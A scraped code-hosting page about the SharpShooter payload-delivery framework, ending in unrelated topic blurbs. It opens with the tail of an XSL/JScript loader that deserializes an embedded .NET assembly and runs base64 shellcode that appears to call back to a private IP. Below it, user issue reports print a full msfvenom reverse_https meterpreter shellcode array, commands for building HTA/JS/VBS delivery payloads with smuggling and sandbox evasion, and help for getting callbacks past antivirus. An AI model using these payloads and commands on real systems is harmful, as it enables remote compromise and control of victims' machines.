"AAAAAAAAAAAAAAAAAAAAAAAAAABsPwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxs"+
"AAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACA"+
"AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAPgDAAAAAAAAAAAAAPgDNAAAAFYAUwBfAFYARQBS"+
"AFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQA"+
"AAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABU"+
"AHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARYAwAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkA"+
"bgBmAG8AAAA0AwAAAQAwADAAMAAwADAANABiADAAAABUAB4AAQBDAG8AbQBtAGUAbgB0AHMAAABT"+
"AGgAYQByAHAAUwBoAG8AbwB0AGUAcgAgAFAAYQB5AGwAbwBhAGQAIABEAGUAbABpAHYAZQByAHkA"+
"AABGABMAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0ARABTAGUAYwAgAEEAYwB0AGkAdgBl"+
"AEIAcgBlAGEAYwBoAAAAAABSABUAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAA"+
"UwBoAGEAcgBwAFMAaABvAG8AdABlAHIAQQBzAHMAZQBtAGIAbAB5AAAAAAAwAAgAAQBGAGkAbABl"+
"AFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABSABkAAQBJAG4AdABlAHIAbgBhAGwA"+
"TgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAuAGQAbABs"+
"AAAAAABoACIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA"+
"dAAgAKkAIABNAEQAUwBlAGMAIABDAG8AbgBzAHUAbAB0AGkAbgBnACAAMgAwADEANwAAACoAAQAB"+
"AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAWgAZAAEATwByAGkAZwBpAG4A"+
"YQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBi"+
"AGwAeQAuAGQAbABsAAAAAABKABUAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFMAaABhAHIA"+
"cABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABW"+
"AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYA"+
"ZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAADAAAAwAAACMPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3Nl"+
"bWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'SharpShooter';
try {
setversion();
var shell = new ActiveXObject('WScript.Shell');
shell.popup("test");
var stm = base64ToStream(serialized_obj);
shell.popup("test");
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
shell.popup("test");
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
var sc = "/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6AAAAAAx/1dXV1dXaDpWeaf/1emkAAAAWzHJUVFqA1FRaLsBAABTUGhXiZ/G/9VQ6YwAAABbMdJSaAAyoIRSUlJTUlBo61UuO//VicaDw1BogDMAAIngagRQah9WaHVGnob/1V8x/1dXav9TVmgtBhh7/9WFwA+EygEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3UHWFDpe////zH/6ZEBAADpyQEAAOhv////LzlGeWQAjTqQubyTrYyq00mM5lJWY6KJ5WC6rmdKmJF/M2/lyLRY5vCvXhZn0bXFouzlRIdE/EI4Gzhf30LN3wWzF1iU8U7qLX0p+E+2zgBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNS4xOyBUcmlkZW50LzQuMDsgSW5mb1BhdGguMSkNCgCAUAL1lcmYG0pfGTbaWbCZr3ucqYLQWmN+0oHSvp85E0TSLU7ahODZ5/kxQdpYYuHiiOA8+cW7ScVxHzrQLkE+0pVMV9UN4ypz1pNg8FgwOnyybZVoy3mdtON7Ima6fNiznDGq+1PlQVQvxptyv4hrDWebe4fo5x03DABlhPC9zW1Fv5N/RHmbzlRnb47XZj/TNHaJamMzGFFGfoyUazQrUz5IT2xB/KZnkBeQkNE36nZ+opHjhWlv7WyB4X52OAe/0J7n6gnD6rkgvB9Yix9GR6arOLsAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0xosHAcOFwHXlWMPoif3//zE3Mi4xNi4xMzIuMQA6UNWZ";
o.Go(sc);
} catch (e) {
debug(e.message);
}
]]>
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="sharp:shooter(.)"/>
</xsl:template>
</xsl:stylesheet>
Payload generation for .net 4 results in a prompt on a default Windows 10 installation to install .net 3.5.
This is via command line and interactive methods.
I believe the confusion is in the code where 1=.net 2 and 2=.net 4 and a decision is made where 2 (meaning .net 4) takes .net 2 instead.
Result is .net 2 payloads are always generated.
Easily missed if testing from a Windows 10 system that has had older .net installed.
Hello,
Not sure if my msfvenom statement is correct? Never received any errors. Also, not seeing any errors after running the "python SharpShooter.py..........." command. So, when my Win10 client downloads the hta payload and Opens it, there's no call back to Meterpreter. Am I missing something here?
Thanks, Chrisandjer949
root@kali:/SharpShooter/output# msfvenom --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.8.10 LPORT=4444 EnableStageEncoding=True StageEncoder=x64/shikata_ga_nai -f csharp/SharpShooter/output# cd ..
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 694 bytes
Final size of csharp file: 3548 bytes
byte[] buf = new byte[694] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0d,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,
0x31,0x30,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x5c,0x11,0x00,0x00,0x4d,
0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,
0x00,0x00,0xff,0xd5,0xe8,0x8e,0x00,0x00,0x00,0x2f,0x46,0x4f,0x58,0x6d,0x70,
0x50,0x32,0x74,0x66,0x53,0x70,0x71,0x48,0x32,0x73,0x64,0x4d,0x66,0x66,0x50,
0x35,0x67,0x43,0x42,0x76,0x48,0x4e,0x73,0x72,0x79,0x4f,0x43,0x37,0x59,0x34,
0x52,0x37,0x67,0x62,0x42,0x46,0x4b,0x36,0x79,0x61,0x34,0x4f,0x72,0x46,0x43,
0x65,0x42,0x62,0x6b,0x6a,0x68,0x74,0x73,0x79,0x34,0x63,0x76,0x39,0x4e,0x58,
0x70,0x64,0x38,0x4b,0x69,0x49,0x43,0x4e,0x36,0x48,0x42,0x76,0x32,0x38,0x66,
0x4f,0x49,0x42,0x74,0x75,0x42,0x48,0x35,0x48,0x53,0x57,0x46,0x30,0x4c,0x48,
0x52,0x4b,0x5a,0x75,0x75,0x4e,0x33,0x71,0x6d,0x39,0x75,0x38,0x73,0x4d,0x36,
0x50,0x56,0x52,0x61,0x52,0x5a,0x33,0x34,0x79,0x68,0x35,0x42,0x78,0x50,0x4d,
0x71,0x59,0x77,0x57,0x46,0x37,0x4e,0x75,0x49,0x70,0x37,0x2d,0x72,0x56,0x52,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
0x32,0xa0,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
0xa2,0x56,0xff,0xd5 };
root@kali:
root@kali:~/SharpShooter# python SharpShooter.py --dotnetver 2 --payload hta --output hta --rawscfile ./raw.txt --web http://192.168.8.10/htadoc.hta --smuggle --template mcafee --deliver web --refs mscorlib.dll,System.Windows.Forms.dll --namespace CL2018.SharpShooter --entrypoint Main
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v1.0
[] Written delivery payload to output/hta.hta
[] File [./output/hta.hta] successfully loaded !
[] Encrypted input file with key [qzfcakkbfa]
[] File [./output/hta.html] successfully created !
root@kali:~/SharpShooter#
appears to have some compatibility issues with python 3 and 3.6. Running through the HTA payload generation causes a python error with Strings module.
Additionally when running a fresh pull with python 2.7 it will not accept a uri for the HTA payload.
I've forked the repo and have started trying to fix the bugs myself but wanted to make MDsec aware of the issues
Thanks for an amazing tool!
Hi, i tested out this framework recently but it didn't work that well for me.
In my scenario, i made use of the web delivery portion to deliver my javascript payload. When the javascript file was executed, it connects back to my attacking web server to get the shellcode (A http meterpreter payload). However that was where the problem arose. From the Windows Defender log, i could see the DLL (meterpreter stager) being dropped onto the AppData\Local\Temp folder, causing windows defender to flag it out as malicious. I'm not sure what's causing this as based on what i read from the readme, the stager should actually be loaded into memory?
Using Python3 causes an UTF-8 encoding error when generating the payload while Python2 works fine.
Example:
root@kali:~/tools/SharpShooter# python3 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
'utf-8' codec can't decode byte 0xda in position 0: invalid continuation byte
[!] Incorrect choice
root@kali:~/tools/SharpShooter#
root@kali:~/tools/SharpShooter# python2 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
[*] Written delivery payload to output/poc.hta
root@kali:~/tools/SharpShooter#
Did I miss something?
Create CobaltStrike (x32) payload like showed in the vimeo video
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output vbstest --rawscfile /root/payload32.bin --sandbox 3,4,5
_____ __ _____ __ __
/ ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____
\__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ /
/____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/
/_/
Dominic Chell, @domchell, MDSec ActiveBreach, v0.2
[*] Avoiding sandbox artifacts
[*] Avoiding bad MACs
[*] Avoiding debugging
[*] Written delivery payload to output/vbstest.vbs
Execute the VBS script Windows 7 (x64): Nothing
Execute the VBS script Windows 10 (x64): An app on your PC needs the following Windows feature
Anyone facing this issue?
Command (e.g)
python2.7 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test
Traceback (most recent call last):
File "SharpShooter.py", line 599, in <module>
ss.run(args)
File "SharpShooter.py", line 527, in run
payload_minified = jsmin(payload)
File "/usr/local/lib/python2.7/dist-packages/jsmin/__init__.py", line 40, in jsmin
ins = klass(js)
TypeError: initial_value must be unicode or None, not str
Problem: modules/excel4.py mixes spaces and tabs.
Version: lastest master
Python version 3.9.0
OS: ParrotOS
Running python3 SharpShooter.py
results in:
Traceback (most recent call last):
File "/mnt/hgfs/debian/SharpShooter/SharpShooter.py", line 21, in <module>
from modules import *
File "/mnt/hgfs/debian/SharpShooter/modules/excel4.py", line 39
if i == 0:
TabError: inconsistent use of tabs and spaces in indentation
I'm trying to generate a shellcode for a stageless sharpshooter payload, and I can't seem to format the shellcode in a way that it likes.
If I use msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=<host> LPORT=80 Prependmigrate=true -f raw -o meter.out
then I get an error during the interactive payload creation like
[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter.out
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
Okay, so I used the -f python
and -f hex
and the like, and it complains thus:
[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter_hex.out
a bytes-like object is required, not 'str'
So I can't seem to satisfy its requirement. What weird thing am I doing wrong here? Or is this a python2/3 deal?
python -V
Python 3.6.4`
Hello,
How to set lhost and lport?I didn't find the options.
Hello,
I didn't find any mention of the license. Could you indicate under which license this license SharpShooter is published ? in the Readme or in a specific LICENSE file.
Thanks
Hi,
Currently I'm generating a RAW payload in Cobalt Strike for a windows/beacon/reverse_https listener. Output is a standard payload.bin file, which is then used as input to SharpShooter as follows:
SharpShooter.py --stageless --dotnetver 4 --payload hta --output test --rawscfile payload.bin
I've also tried the following variation:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile payload.bin --smuggle --template mcafee
However every time I try to run the HTA file on Windows, the payload fails to call back. Windows Defender is disabled for all of this testing, and no other AV is present. Network monitoring with Wireshark confirms too that the payload is not calling out. I have tried modifying the harness.hta template to just take the payload.bin as input, without any base64 encoding or the rc4 encipherment to check if it works, however the payload still refuses to call out or even make a network connection attempt.
Am I being obtuse or can someone confirm these findings? I have tried with both Internet Explorer and of course Microsoft (R) HTML Application Host.
Would be cool if we could use Python3 instead of 2 for this. It doesn't even run for me with Python2 now.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.